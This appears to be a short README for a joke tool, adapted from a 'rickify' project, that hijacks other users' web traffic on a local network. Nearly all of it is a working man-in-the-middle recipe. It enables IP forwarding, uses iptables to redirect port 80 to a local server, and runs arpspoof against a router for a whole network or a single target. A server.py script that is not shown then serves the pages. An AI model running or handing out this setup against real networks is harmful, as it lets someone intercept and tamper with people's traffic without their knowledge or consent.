# computer man
modified version of github.com/kjempelodott/rickify :)
(assumes kali linux env)

Install the required tools `apt install dsniff`

## I am the computer man

```sh
sysctl -w net.ipv4.ip_forward=1

# forward ports to the right places
iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8080

# https, does not work because 'encryption' and 'security'
# iptables -t nat -I PREROUTING -p tcp --dport 443 -j REDIRECT --to-port 4443
```

## I can do everything you can
```sh
arpspoof <ROUTER>             # spoof for entire network
arpspoof <ROUTER> -t <TARGET> # spoof for specific target
```

## Computer man he is your friend
```sh
python server.py
```
